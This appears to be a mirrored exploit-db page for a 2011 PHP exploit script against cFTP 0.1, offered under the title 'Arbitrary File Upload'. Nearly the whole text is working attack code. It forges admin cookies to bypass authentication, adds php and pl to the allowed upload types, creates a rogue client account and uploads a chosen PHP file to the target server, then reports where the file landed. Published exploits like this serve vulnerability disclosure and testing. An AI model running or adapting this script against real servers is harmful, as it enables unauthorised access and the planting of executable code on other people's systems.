扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 |
<?php # Exploit Title: cFTP <= 0.1 (r80) Arbitrary File Upload # Date: 2011-07-29 # Author: leviathan (vulnerability discovered by Simon Leblanc : <https://code.google.com/p/clients-oriented-ftp/issues/detail?id=78>) # Software Link: https://code.google.com/p/clients-oriented-ftp/downloads/list # Version: 0.1 # Tested on: linux // Vulnerable URL $url = 'http://[url domain]/cFTP/'; // The file to upload $filename = dirname(__FILE__).'/info.php'; $failext = array('php', 'pl'); $username = 'hackname'.rand(0, 999999); $cookies_injection = 'access=admin; userlevel=9'; // <-- the big error of this app :-) /** * Call URL */ function curl_call_url($url, $cookies_injection, $inputs = null) { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_COOKIE, $cookies_injection); if (is_array($inputs) === true) { curl_setopt($curl, CURLOPT_POSTFIELDS, $inputs); } $response = curl_exec($curl); $headers = curl_getinfo($curl); $error_number = curl_errno($curl); $error_message= curl_error($curl); curl_close($curl); return array($response, $headers, $error_number, $error_message); } // Add vulnerable extensions (php, pl : defined in $failext) list($response, $headers, $error_number, $error_message) = curl_call_url($url.'options.php', $cookies_injection); if (preg_match_all('/<input([^>]+)name="([^"]+)"([^>]+)value="([^"]+)([^>]*)>/', $response, $matches)) { $input = array(); $count = count($matches[0]); for ($i = 0; $i < $count; $i++) { $input[$matches[2][$i]] = $matches[4][$i]; if ($matches[2][$i] === 'allowed_file_types') { foreach ($failext as $ext) { if (strpos($matches[4][$i], $ext) === false) { $input[$matches[2][$i]] .= ','.$ext; } } $input[$matches[2][$i]] = str_replace(',', '|', $input[$matches[2][$i]]); } } // add select if (preg_match('/<option selected="selected" value="([^"]+)"/', $response, $matches)) { $input['timezone'] = $matches[1]; } else { $input['timezone'] = 'America/Argentina/Buenos_Aires'; } // Validate the form to add the vulnerables extensions list($response, $headers, $error_number, $error_message) = curl_call_url($url.'options.php', $cookies_injection, $input); if (strpos($response, 'message_ok') !== false) { // Add new client : required to upload the file $input = array( 'add_client_form_name' => $username, 'add_client_form_user' => $username, 'add_client_form_pass' => 'hackname', 'add_client_form_pass2' => 'hackname', 'add_client_form_address' => 'my address', 'add_client_form_phone' => '000-000-000', //'add_client_form_notify' => '0', 'add_client_form_email' => $username.'@example.com', 'add_client_form_intcont' => '', 'Submit' => 'Create account', ); list($response, $headers, $error_number, $error_message) = curl_call_url($url.'clientform.php', $cookies_injection, $input); if (strpos($response, 'message_ok') !== false) { // Now upload file :-) $input = array( 'name' => 'my_hack_file', 'description' => 'It\'s my hack file', 'clientname' => $username, 'ufile' => '@'.$filename, 'Submit' => 'Upload', ); list($response, $headers, $error_number, $error_message) = curl_call_url($url.'fileupload.php', $cookies_injection, $input); if (preg_match('#<a href="https://www.exploit-db.com/exploits/17584/([^"]+)">File uploaded correctly#', $response, $matches)) { // get filename list($response, $headers, $error_number, $error_message) = curl_call_url($url.$matches[1], $cookies_injection); if (preg_match('#<a href="https://www.exploit-db.com/exploits/17584/([^"]+)'.basename($filename).'" target="_blank"#', $response, $matches_end)) { echo 'Your file is here : '.$url.$matches[1].$matches_end[1].basename($filename); } else { var_dump($response); echo 'fail to hack : where is the file !!!'; } } else { var_dump($response); echo 'fail to hack : file not uploaded'; } } else { var_dump($response); echo 'fail to hack : client not created'; } } else { var_dump($response); echo 'fail to hack : options not changed'; } } else { var_dump($response); echo 'fail to hack : no input'; } |
体验盒子
